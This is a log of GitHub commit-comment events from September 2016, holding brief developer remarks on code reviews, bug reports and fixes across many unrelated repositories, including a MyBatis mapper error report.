{"id":"4639729949","type":"CommitCommentEvent","actor":{"login":"brendangregg"},"repo":{"name":"brendangregg/FlameGraph"},"payload":{"comment":{"id":19230417,"position":null,"line":null,"path":null,"commit_id":"4c7fdf3d56d20c5387e82ccdbffb501419b43737","created_at":"2016-09-29T20:25:02Z","updated_at":"2016-09-29T20:25:02Z","body":"@tjake I've removed the \".\" test for java for now; for me it kept matching \"pthread_cond_signal@@GLIBC_2.3.2\" (user-level C), \"sock_aio_read.part.8\" (kernel-level C), etc. I don't have examples of Java code that needed the \".\" match, but if you have some, let me know, and maybe there's a way we can fix the regexp. Thanks"}},"created_at":"2016-09-29T20:25:02Z"}
{"id":"4639735030","type":"CommitCommentEvent","actor":{"login":"jdhf"},"repo":{"name":"jdhf/jdhf.github.io"},"payload":{"comment":{"id":19230426,"position":null,"line":null,"path":null,"commit_id":"089c5ddb2fd7907b8886c8bdb95dd41364735f14","created_at":"2016-09-29T20:25:53Z","updated_at":"2016-09-29T20:25:53Z","body":"1. "}},"created_at":"2016-09-29T20:25:53Z"}
{"id":"4639736651","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230429,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:26:10Z","updated_at":"2016-09-29T20:26:10Z","body":"I figured that cause of https://github.com/xbmc/xbmc/pull/10567 😃 "}},"created_at":"2016-09-29T20:26:10Z"}
{"id":"4639736669","type":"CommitCommentEvent","actor":{"login":"bazarco"},"repo":{"name":"aspnet/EntityFramework6"},"payload":{"comment":{"id":19230430,"position":7,"line":87,"path":"src/EntityFramework/Core/Mapping/FunctionImportMappingComposableHelper.cs","commit_id":"b4cb2b17ac24a611719b18cb3c890b59d076a290","created_at":"2016-09-29T20:26:10Z","updated_at":"2016-09-29T20:26:10Z","body":"I will. But it was a faster way to post something info. And don't forget where issue located also. I've found this commit reference here:\r\nhttps://blog.3d-logic.com/2014/04/09/support-for-store-functions-tvfs-and-stored-procs-in-entity-framework-6-1/#comment-3595"}},"created_at":"2016-09-29T20:26:10Z"}
{"id":"4639738860","type":"CommitCommentEvent","actor":{"login":"mlafleur"},"repo":{"name":"OfficeDev/office-js-docs"},"payload":{"comment":{"id":19230441,"position":null,"line":null,"path":null,"commit_id":"bcd3cd494074d914cb4eac72a2dab4f1a1219dda","created_at":"2016-09-29T20:26:32Z","updated_at":"2016-09-29T20:26:32Z","body":"Fixes #529 \r\n\r\n_linking to issue_"}},"created_at":"2016-09-29T20:26:32Z"}
{"id":"4639740283","type":"CommitCommentEvent","actor":{"login":"StShadow"},"repo":{"name":"StShadow/stinger-info"},"payload":{"comment":{"id":19230444,"position":null,"line":null,"path":null,"commit_id":"df918f450a8c7770b80018446e3ef990b42b1edc","created_at":"2016-09-29T20:26:43Z","updated_at":"2016-09-29T20:26:43Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [DB schema](https://trello.com/c/zyFV5SHN/11-db-schema)"}},"created_at":"2016-09-29T20:26:43Z"}
{"id":"4639743699","type":"CommitCommentEvent","actor":{"login":"XFuryMCPE"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":19230454,"position":null,"line":null,"path":null,"commit_id":"d0318c5fec0a076609e6b3e7ebfaed4e4e1abd01","created_at":"2016-09-29T20:27:17Z","updated_at":"2016-09-29T20:27:17Z","body":"add this to nemisys ;-;"}},"created_at":"2016-09-29T20:27:17Z"}
{"id":"4639745149","type":"CommitCommentEvent","actor":{"login":"bradchristensen"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19230458,"position":4,"line":13,"path":"packages/babel-register/src/node.js","commit_id":"aa0aada8ad136c7d932eb04b4dd405e55b5c3fa7","created_at":"2016-09-29T20:27:30Z","updated_at":"2016-09-29T20:27:30Z","body":"You have to laugh about it though. :stuck_out_tongue_closed_eyes: I died a little inside finding that this was also my issue after I assumed it was my refactoring :cry: "}},"created_at":"2016-09-29T20:27:30Z"}
{"id":"4639747199","type":"CommitCommentEvent","actor":{"login":"BigNoid"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230465,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:27:52Z","updated_at":"2016-09-29T20:27:52Z","body":"Yeah was trying if that could work to no avail"}},"created_at":"2016-09-29T20:27:52Z"}
{"id":"4639748519","type":"CommitCommentEvent","actor":{"login":"zhouyx"},"repo":{"name":"ampproject/docs"},"payload":{"comment":{"id":19230474,"position":null,"line":null,"path":null,"commit_id":"056a3d89f346c301ca2c4a81d2130523684bae8c","created_at":"2016-09-29T20:28:06Z","updated_at":"2016-09-29T20:28:06Z","body":"LGTM. Thanks for the fix."}},"created_at":"2016-09-29T20:28:06Z"}
{"id":"4639751865","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":19230485,"position":6,"line":174,"path":"src/main/java/techreborn/proxies/ClientProxy.java","commit_id":"ca13adf3aaa98b39ca30eaa5c56fc32349d06785","created_at":"2016-09-29T20:28:42Z","updated_at":"2016-09-29T20:28:42Z","body":"Magic?"}},"created_at":"2016-09-29T20:28:42Z"}
{"id":"4639753750","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230492,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:29:03Z","updated_at":"2016-09-29T20:29:03Z","body":"I wouldn't have noticed because I sadly do not yet have a LibreElec install 😦 "}},"created_at":"2016-09-29T20:29:03Z"}
{"id":"4639760880","type":"CommitCommentEvent","actor":{"login":"GPMueller"},"repo":{"name":"GPMueller/arch-installer"},"payload":{"comment":{"id":19230509,"position":null,"line":null,"path":null,"commit_id":"8617fdeeae1aff498559c313b52c53d3f1f5ceaa","created_at":"2016-09-29T20:30:20Z","updated_at":"2016-09-29T20:30:20Z","body":"this fixes #5 "}},"created_at":"2016-09-29T20:30:20Z"}
{"id":"4639762723","type":"CommitCommentEvent","actor":{"login":"rakeshreddyvanga"},"repo":{"name":"shruthivinjamuri/CS999Independent_Study"},"payload":{"comment":{"id":19230513,"position":null,"line":null,"path":null,"commit_id":"09b9dbc1da37474317ef721e69551824eea749bb","created_at":"2016-09-29T20:30:39Z","updated_at":"2016-09-29T20:30:39Z","body":"Instead of creating nodes directly in this class, how about using the graphLibrary so that you can test your changes end to end?"}},"created_at":"2016-09-29T20:30:39Z"}
{"id":"4639763019","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":19230514,"position":6,"line":174,"path":"src/main/java/techreborn/proxies/ClientProxy.java","commit_id":"ca13adf3aaa98b39ca30eaa5c56fc32349d06785","created_at":"2016-09-29T20:30:41Z","updated_at":"2016-09-29T20:30:41Z","body":"almost, I wrote this a while, but now I just need to go though most of the json files and make them work."}},"created_at":"2016-09-29T20:30:41Z"}
{"id":"4639764775","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19230517,"position":null,"line":null,"path":null,"commit_id":"1e2d55acf0c10fd9dd83e3cd075466702ba733db","created_at":"2016-09-29T20:31:00Z","updated_at":"2016-09-29T20:31:00Z","body":"Ref. the issue [**[Core][NETWORKIO] Player XX requests non-existing seer XX**](https://github.com/TrinityCore/TrinityCore/issues/8310) #8310 that you closed.  ;-)"}},"created_at":"2016-09-29T20:31:00Z"}
{"id":"4639766225","type":"CommitCommentEvent","actor":{"login":"xorgy"},"repo":{"name":"LewisArdern/augury"},"payload":{"comment":{"id":19230518,"position":null,"line":null,"path":null,"commit_id":"4979292dd8ef81ddd8f4f2435e93fca8301d0abc","created_at":"2016-09-29T20:31:16Z","updated_at":"2016-09-29T20:31:16Z","body":"Is there a problem with this which we should address?"}},"created_at":"2016-09-29T20:31:16Z"}
{"id":"4639768019","type":"CommitCommentEvent","actor":{"login":"EgrOnWire"},"repo":{"name":"Metastruct/garrysmod-chatsounds"},"payload":{"comment":{"id":19230523,"position":null,"line":null,"path":null,"commit_id":"acc9d00b476caabc6799c2a01abe6ae5f7883764","created_at":"2016-09-29T20:31:38Z","updated_at":"2016-09-29T20:31:38Z","body":"no"}},"created_at":"2016-09-29T20:31:38Z"}
{"id":"4639770859","type":"CommitCommentEvent","actor":{"login":"shakyShane"},"repo":{"name":"BrowserSync/browser-sync"},"payload":{"comment":{"id":19230529,"position":null,"line":null,"path":null,"commit_id":"27a08c2aad477922ab01aa979100f56cfe89c10c","created_at":"2016-09-29T20:32:07Z","updated_at":"2016-09-29T20:32:07Z","body":"not because currently this is mis-leading as it can be a bool/pjo \r\n\r\nthis is a limitation of 'yarg' tbh and can be solved with the docs I think :)"}},"created_at":"2016-09-29T20:32:07Z"}
{"id":"4639782358","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":19230556,"position":6,"line":174,"path":"src/main/java/techreborn/proxies/ClientProxy.java","commit_id":"ca13adf3aaa98b39ca30eaa5c56fc32349d06785","created_at":"2016-09-29T20:34:08Z","updated_at":"2016-09-29T20:34:08Z","body":"Things are so much more organized. Yeah."}},"created_at":"2016-09-29T20:34:08Z"}
{"id":"4639785784","type":"CommitCommentEvent","actor":{"login":"telephon"},"repo":{"name":"supercollider/supercollider"},"payload":{"comment":{"id":19230562,"position":null,"line":null,"path":null,"commit_id":"b30639489fb2f01c0f427dd8f3c668af7c8db3b1","created_at":"2016-09-29T20:34:47Z","updated_at":"2016-09-29T20:34:47Z","body":"It would be great if you could make a pull request for the quark: https://github.com/supercollider-quarks/JITLibExtensions\r\n\r\nthanks!"}},"created_at":"2016-09-29T20:34:47Z"}
{"id":"4639790241","type":"CommitCommentEvent","actor":{"login":"ccw808"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19230579,"position":null,"line":null,"path":null,"commit_id":"6b0ed3582a2f92e7b96e74425d84af4a90ac4426","created_at":"2016-09-29T20:35:38Z","updated_at":"2016-09-29T20:35:38Z","body":"No"}},"created_at":"2016-09-29T20:35:38Z"}
{"id":"4639790575","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":19230581,"position":6,"line":174,"path":"src/main/java/techreborn/proxies/ClientProxy.java","commit_id":"ca13adf3aaa98b39ca30eaa5c56fc32349d06785","created_at":"2016-09-29T20:35:42Z","updated_at":"2016-09-29T20:35:42Z","body":"They are, most of this was done by @Yulife \r\nIm still fighting with jsons: https://modmuss50.me/shots/java_2016-09-29_21-16-36.png"}},"created_at":"2016-09-29T20:35:42Z"}
{"id":"4639793034","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19230585,"position":6,"line":11,"path":"language-project/dao/src/main/java/com/language/dao/ContentDao.java","commit_id":"c6dc49c6399bbfcec4d36cac51df79a53291f0d3","created_at":"2016-09-29T20:36:10Z","updated_at":"2016-09-29T20:36:10Z","body":"почему решил добавить модификатор доступа ?"}},"created_at":"2016-09-29T20:36:10Z"}
{"id":"4639797761","type":"CommitCommentEvent","actor":{"login":"justinedelson"},"repo":{"name":"Adobe-Consulting-Services/acs-aem-commons"},"payload":{"comment":{"id":19230594,"position":null,"line":null,"path":null,"commit_id":"c4fc7d82a539d27faefcdb992ce50b149762697e","created_at":"2016-09-29T20:37:02Z","updated_at":"2016-09-29T20:37:02Z","body":"@davidjgonzalez I'm assuming this needs to be set on `/`, but it might be nice to be able to restrict it further. Also, any reason why the dispatcher flush thing needs to write to the repository?"}},"created_at":"2016-09-29T20:37:02Z"}
{"id":"4639800996","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/app-maven-plugin"},"payload":{"comment":{"id":19230603,"position":null,"line":null,"path":null,"commit_id":"41d23f0360267c2842ba00d5eae89ad40f9d6346","created_at":"2016-09-29T20:37:39Z","updated_at":"2016-09-29T20:37:39Z","body":"@loosebazooka PTAL"}},"created_at":"2016-09-29T20:37:39Z"}
{"id":"4639806006","type":"CommitCommentEvent","actor":{"login":"yoosefi"},"repo":{"name":"POPSuL/ApiGen"},"payload":{"comment":{"id":19230616,"position":null,"line":null,"path":null,"commit_id":"1a1199160eba9aa1062599fe1ff4d8a8942f5b78","created_at":"2016-09-29T20:38:32Z","updated_at":"2016-09-29T20:38:32Z","body":"bless"}},"created_at":"2016-09-29T20:38:32Z"}
{"id":"4639811270","type":"CommitCommentEvent","actor":{"login":"DmitryIT"},"repo":{"name":"DmitryIT/MITx6.00.1x"},"payload":{"comment":{"id":19230629,"position":5,"line":3,"path":"week2/polysum.py","commit_id":"f494613ec5d086c59e2f3663eaa7f99ff87dd41d","created_at":"2016-09-29T20:39:25Z","updated_at":"2016-09-29T20:39:25Z","body":"please remove non working code."}},"created_at":"2016-09-29T20:39:25Z"}
{"id":"4639819032","type":"CommitCommentEvent","actor":{"login":"nandctl"},"repo":{"name":"mybatis/mybatis-3"},"payload":{"comment":{"id":19230646,"position":null,"line":null,"path":null,"commit_id":"e37d9fb49a3dcb7fa58acd6fc42c71e4d749ebe4","created_at":"2016-09-29T20:40:49Z","updated_at":"2016-09-29T20:40:49Z","body":"I am stll having the issue when i migrate to 3.4.1. do i need to recompile my client class files?\r\n\r\n\r\norg.apache.ibatis.exceptions.PersistenceException: \r\n### Error querying database.  Cause: org.apache.ibatis.binding.BindingException: Parameter 'distinct' not found. Available parameters are [param1, param2, tableName, example]\r\n### Cause: org.apache.ibatis.binding.BindingException: Parameter 'distinct' not found. Available parameters are [param1, param2, tableName, example]\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-29T20:40:49Z"}
{"id":"4639827087","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19230682,"position":64,"line":532,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:42:16Z","updated_at":"2016-09-29T20:42:16Z","body":"set a default value somehow otherwise the code can later throw warnings when you use $poetry's array items if the variable is not set in db"}},"created_at":"2016-09-29T20:42:16Z"}
{"id":"4639827927","type":"CommitCommentEvent","actor":{"login":"BigNoid"},"repo":{"name":"BigNoid/Aeon-Nox"},"payload":{"comment":{"id":19230683,"position":5,"line":582,"path":"1080i/Includes_Widgets.xml","commit_id":"f165eb3ef1c665e7fbe82476c46e8dbbc42c4d69","created_at":"2016-09-29T20:42:25Z","updated_at":"2016-09-29T20:42:25Z","body":"Really, get a Pi2/3 with LibreELEC. Best player out there imo."}},"created_at":"2016-09-29T20:42:25Z"}
{"id":"4639828440","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19230684,"position":8,"line":34,"path":"src/Provider/MenuServiceProvider.php","commit_id":"aec68543a6d52ed0db717610cccb9d1f4b3cd0c6","created_at":"2016-09-29T20:42:30Z","updated_at":"2016-09-29T20:42:30Z","body":"Nothing was invoking it too early, which is why I was ok with this commit. But _technically_ services shouldn't be dependent on that. I would rather pass url generator in and generate path when needed."}},"created_at":"2016-09-29T20:42:30Z"}
{"id":"4639828874","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19230690,"position":null,"line":null,"path":null,"commit_id":"1e2d55acf0c10fd9dd83e3cd075466702ba733db","created_at":"2016-09-29T20:42:35Z","updated_at":"2016-09-29T20:42:35Z","body":"Yep, thanks :P"}},"created_at":"2016-09-29T20:42:35Z"}
{"id":"4639830270","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19230694,"position":23,"line":30,"path":"spec/imdb_budgets_spec.rb","commit_id":"10c9318084b5d17faaf6f3a9a3710ff6ec44e862","created_at":"2016-09-29T20:42:50Z","updated_at":"2016-09-29T20:42:50Z","body":"Ну, этот тест (и ко всем это относится) пройдёт и такой код:\r\n\r\n```ruby\r\ndef take_info(*)\r\n  []\r\nend\r\n```"}},"created_at":"2016-09-29T20:42:50Z"}
{"id":"4639831621","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19230714,"position":10,"line":10,"path":"src/Configuration/PathsProxy.php","commit_id":"2e915413b2607d539da8f0985ec5dcea260a9bca","created_at":"2016-09-29T20:43:03Z","updated_at":"2016-09-29T20:43:03Z","body":"Wrote this class in February :)"}},"created_at":"2016-09-29T20:43:03Z"}
{"id":"4639833656","type":"CommitCommentEvent","actor":{"login":"asmeurer"},"repo":{"name":"sympy/sympy-paper"},"payload":{"comment":{"id":19230766,"position":2,"line":368,"path":"rebuttal.tex","commit_id":"58453435aa7c377952461391e8c0776650bac625","created_at":"2016-09-29T20:43:23Z","updated_at":"2016-09-29T20:43:23Z","body":"Should we include more information (like the things I cited above) in the rebuttal? Right now it just says\r\n\r\n> Different style guides appear to disagree on the proper way to pluralize non-plural acronyms that end in “S”. We have been informed by the PeerJ publishing staff that either form (“CASs” or “CAS’s”) is acceptable, so long as we are consistent. We have chosen “CAS’s” as suggested, and have changed all instances in the manuscript.\r\n\r\n@scopatz "}},"created_at":"2016-09-29T20:43:23Z"}
{"id":"4639834677","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19230786,"position":22,"line":22,"path":"src/Twig/Handler/RoutingHandler.php","commit_id":"7ea60c06c802aad4723e67a8018cd8eb3c0c0855","created_at":"2016-09-29T20:43:34Z","updated_at":"2016-09-29T20:43:34Z","body":"Just trying to be consistent...I know it's all due to be refactored soon anyways."}},"created_at":"2016-09-29T20:43:34Z"}
{"id":"4639835009","type":"CommitCommentEvent","actor":{"login":"iqbal-lab"},"repo":{"name":"iqbal-lab/pandora"},"payload":{"comment":{"id":19230796,"position":null,"line":null,"path":null,"commit_id":"8bf478ba041402767fb535265de88594904e8e20","created_at":"2016-09-29T20:43:37Z","updated_at":"2016-09-29T20:43:37Z","body":"Oh god - I did not realise I was making a PR"}},"created_at":"2016-09-29T20:43:37Z"}
{"id":"4639838690","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19230853,"position":16,"line":13,"path":"language-project/web/src/main/webapp/views/continueCourse.jsp","commit_id":"c6dc49c6399bbfcec4d36cac51df79a53291f0d3","created_at":"2016-09-29T20:44:15Z","updated_at":"2016-09-29T20:44:15Z","body":"стили нужно вынести в отдельный файл .css"}},"created_at":"2016-09-29T20:44:15Z"}
{"id":"4639840901","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19230873,"position":90,"line":90,"path":"src/Canonical.php","commit_id":"03050344326626578c4ed9cca12f265ffcd5d9ac","created_at":"2016-09-29T20:44:37Z","updated_at":"2016-09-29T20:44:37Z","body":"Hmm that's a good point. Maybe we check the current scheme and if it's `https` then leave it?"}},"created_at":"2016-09-29T20:44:37Z"}
{"id":"4639847086","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/app-maven-plugin"},"payload":{"comment":{"id":19230966,"position":null,"line":null,"path":null,"commit_id":"41d23f0360267c2842ba00d5eae89ad40f9d6346","created_at":"2016-09-29T20:45:41Z","updated_at":"2016-09-29T20:45:41Z","body":":ship: "}},"created_at":"2016-09-29T20:45:41Z"}
{"id":"4639847920","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19230996,"position":163,"line":631,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:45:49Z","updated_at":"2016-09-29T20:45:49Z","body":"set the second parameter as default value or in the next line check the array item exists or not otherwise the code can throw warning."}},"created_at":"2016-09-29T20:45:49Z"}
{"id":"4639847964","type":"CommitCommentEvent","actor":{"login":"netlooker"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19230998,"position":64,"line":532,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:45:50Z","updated_at":"2016-09-29T20:45:50Z","body":"That variable is set up in the settings.php individually for each subsite so if you want to use poetry you need to have it."}},"created_at":"2016-09-29T20:45:50Z"}
{"id":"4639850600","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231041,"position":null,"line":null,"path":null,"commit_id":"18d4ada6f5c97e8eb2c138d458ec2854fd99044a","created_at":"2016-09-29T20:46:18Z","updated_at":"2016-09-29T20:46:18Z","body":"I don't think so. It's still a hack in my mind. We shouldn't be guessing at which route we should use; that is _magic_ 🙈 . I would rather have the route to be used given to the _content type_, that way it's still configurable but we don't have to guess at it."}},"created_at":"2016-09-29T20:46:18Z"}
{"id":"4639852437","type":"CommitCommentEvent","actor":{"login":"GlennRicaud"},"repo":{"name":"GlennRicaud/foos-app"},"payload":{"comment":{"id":19231063,"position":null,"line":null,"path":null,"commit_id":"1d09ca417b6916fd80f7ece6699984b0e6d711c9","created_at":"2016-09-29T20:46:37Z","updated_at":"2016-09-29T20:46:37Z","body":"👍 "}},"created_at":"2016-09-29T20:46:37Z"}
{"id":"4639853972","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231075,"position":173,"line":641,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:46:53Z","updated_at":"2016-09-29T20:46:53Z","body":"use drupal_strtoupper."}},"created_at":"2016-09-29T20:46:53Z"}
{"id":"4639854002","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231076,"position":90,"line":90,"path":"src/Canonical.php","commit_id":"03050344326626578c4ed9cca12f265ffcd5d9ac","created_at":"2016-09-29T20:46:54Z","updated_at":"2016-09-29T20:46:54Z","body":"Yeah … HTTP is gradually on the way out, and I can see this biting us in the short term."}},"created_at":"2016-09-29T20:46:54Z"}
{"id":"4639854074","type":"CommitCommentEvent","actor":{"login":"Alphadestrious"},"repo":{"name":"neobuddy89/android_device_moto_shamu"},"payload":{"comment":{"id":19231077,"position":null,"line":null,"path":null,"commit_id":"209cdec90f77ac7d21f585456ac97b30662aba83","created_at":"2016-09-29T20:46:54Z","updated_at":"2016-09-29T20:46:54Z","body":"Neobuddy, what was wrong with audio to delete and revert back? "}},"created_at":"2016-09-29T20:46:54Z"}
{"id":"4639856206","type":"CommitCommentEvent","actor":{"login":"Towhid1"},"repo":{"name":"Asif-Hassan/BRBT-dataset-pickles"},"payload":{"comment":{"id":19231088,"position":null,"line":null,"path":null,"commit_id":"ccad210f4c84645d5fc0d6ee8385a43c12b1836d","created_at":"2016-09-29T20:47:16Z","updated_at":"2016-09-29T20:47:16Z","body":"Bro !I need this dataset for my Thesis research . Let me know your email or contact . "}},"created_at":"2016-09-29T20:47:16Z"}
{"id":"4639865704","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231118,"position":14,"line":56,"path":"src/Twig/Handler/ImageHandler.php","commit_id":"fb101327d8d076ac0ec08618c1cc623c298c64f9","created_at":"2016-09-29T20:48:55Z","updated_at":"2016-09-29T20:48:55Z","body":"Yeah my goal/purpose was to make a simple one liner that would be forwards and backwards compatible. So both `files://foo/bar.jpg` works and `theme-sub-folder/bar.jpg` will give you file objects to work with, regardless of actual filesystem."}},"created_at":"2016-09-29T20:48:55Z"}
{"id":"4639866826","type":"CommitCommentEvent","actor":{"login":"sk3853"},"repo":{"name":"sk3853/corpus-joyce-portrait-TEI"},"payload":{"comment":{"id":19231119,"position":null,"line":null,"path":null,"commit_id":"16d0d5ed5ad989d22df374c419505c33b3f12202","created_at":"2016-09-29T20:49:07Z","updated_at":"2016-09-29T20:49:07Z","body":"In comparison to chapter 1, there are far fewer compound words in chapter 2.  This I attribute to Stephen growing older and more self-aware, as I view the compound words as a symbol of childishness, as well as creativity and creative freedom.  There are the words \"cowyard\" and \"cowhairs,\" reminiscent of the \"moocow\" from the first, nursery-rhyme-like paragraph of the novel.  There is also the word \"dinnertable\" with relation to his father's second moiety notices, very close in proximation to the word \"dressingngtable,\" with relation to his mother's bedroom mirror.  Juxtaposing these two similar but different compounds allows the reader to draw conclusions regarding what he sees as motherly and what he regards to be fatherly."}},"created_at":"2016-09-29T20:49:07Z"}
{"id":"4639868804","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"neobuddy89/android_device_moto_shamu"},"payload":{"comment":{"id":19231130,"position":null,"line":null,"path":null,"commit_id":"209cdec90f77ac7d21f585456ac97b30662aba83","created_at":"2016-09-29T20:49:27Z","updated_at":"2016-09-29T20:49:27Z","body":"I took fresh nougat kernel fork and readded commits to it.\r\ncompress offload features in kernel are yet to be added.\r\nhttps://github.com/neobuddy89/android_device_moto_shamu/commits/cm-14.0"}},"created_at":"2016-09-29T20:49:27Z"}
{"id":"4639868925","type":"CommitCommentEvent","actor":{"login":"davidjgonzalez"},"repo":{"name":"Adobe-Consulting-Services/acs-aem-commons"},"payload":{"comment":{"id":19231132,"position":null,"line":null,"path":null,"commit_id":"c4fc7d82a539d27faefcdb992ce50b149762697e","created_at":"2016-09-29T20:49:29Z","updated_at":"2016-09-29T20:49:29Z","body":"No need to write.  I supposed its reasonable you'd want to flush ~ anything."}},"created_at":"2016-09-29T20:49:29Z"}
{"id":"4639869522","type":"CommitCommentEvent","actor":{"login":"rmnorris"},"repo":{"name":"rmnorris/pandora"},"payload":{"comment":{"id":19231134,"position":null,"line":null,"path":null,"commit_id":"93f0737e82b8b6f1df13eb8d30f123ad0eeb10a3","created_at":"2016-09-29T20:49:34Z","updated_at":"2016-09-29T20:49:34Z","body":"Not so surprising - only 3 files, and the most basic at that! :)"}},"created_at":"2016-09-29T20:49:34Z"}
{"id":"4639870519","type":"CommitCommentEvent","actor":{"login":"nandctl"},"repo":{"name":"mybatis/mybatis-3"},"payload":{"comment":{"id":19231135,"position":null,"line":null,"path":null,"commit_id":"e37d9fb49a3dcb7fa58acd6fc42c71e4d749ebe4","created_at":"2016-09-29T20:49:43Z","updated_at":"2016-09-29T20:49:43Z","body":"public class CfTierGroupDAOImpl  implements CfTierGroupDAO {\t \r\n    \r\n    public List<CfTierGroup> selectBy(String tableName, CfTierGroupExample example) throws Exception {\r\n        SqlSession session = null;\r\n       try{\r\n           session  = DataMapperSessionFactoryListener.getSqlSessionFactory().openSession();\r\n           CfTierGroupMapper mapper = session.getMapper(CfTierGroupMapper.class);\r\n            List<CfTierGroup> list = mapper.selectByExample(tableName, example);        \r\n           return list;\r\n       } finally {\r\n           if(session != null){\r\n               session.close();\r\n           }            \r\n       }\r\n   }\r\n   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n   \r\n   Mapper \r\n   public interface CfTierGroupMapper {\r\n     /**\r\n     * This method was generated by MyBatis Generator.\r\n     * This method corresponds to the database table dbo.CF_TIER_GROUP\r\n     *\r\n     * @mbggenerated Tue Apr 02 16:35:41 IST 2013\r\n     */\r\n    List<CfTierGroup> selectByExample(@Param(\"tableName\") String tableName, @Param(\"example\") CfTierGroupExample example);\r\n\t\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n\t\r\n\tCfTierGroupMapper\r\n\t\r\n\t <select id=\"selectByExample\" resultMap=\"BaseResultMap\" parameterType=\"map\" >\r\n    <!--\r\n      WARNING - @mbggenerated\r\n      This element is automatically generated by MyBatis Generator, do not modify.\r\n      This element was generated on Tue Apr 02 16:35:41 IST 2013.\r\n    -->\r\n    select\r\n    <if test=\"distinct\" >\r\n      distinct\r\n    </if>\r\n    <include refid=\"Base_Column_List\" />\r\n    from ${tableName}\r\n    <if test=\"_parameter != null\" >\r\n      <include refid=\"Example_Where_Clause\" />\r\n    </if>\r\n    <if test=\"orderByClause != null\" >\r\n      order by ${orderByClause}\r\n    </if>\r\n  </select>"}},"created_at":"2016-09-29T20:49:43Z"}
{"id":"4639872174","type":"CommitCommentEvent","actor":{"login":"douglasjacobsen"},"repo":{"name":"ESMCI/cime"},"payload":{"comment":{"id":19231138,"position":null,"line":null,"path":null,"commit_id":"63772d874cdfe7618a27805b82aab9bbdd6fbd00","created_at":"2016-09-29T20:50:03Z","updated_at":"2016-09-29T20:50:03Z","body":"@apcraig: Could you let me know if you see any issues with this change? This is what we use in stand-alone MPAS to allow us to compare time intervals that have years and months in them, but I'm curious if there's an obvious issue related to how coupled models work."}},"created_at":"2016-09-29T20:50:03Z"}
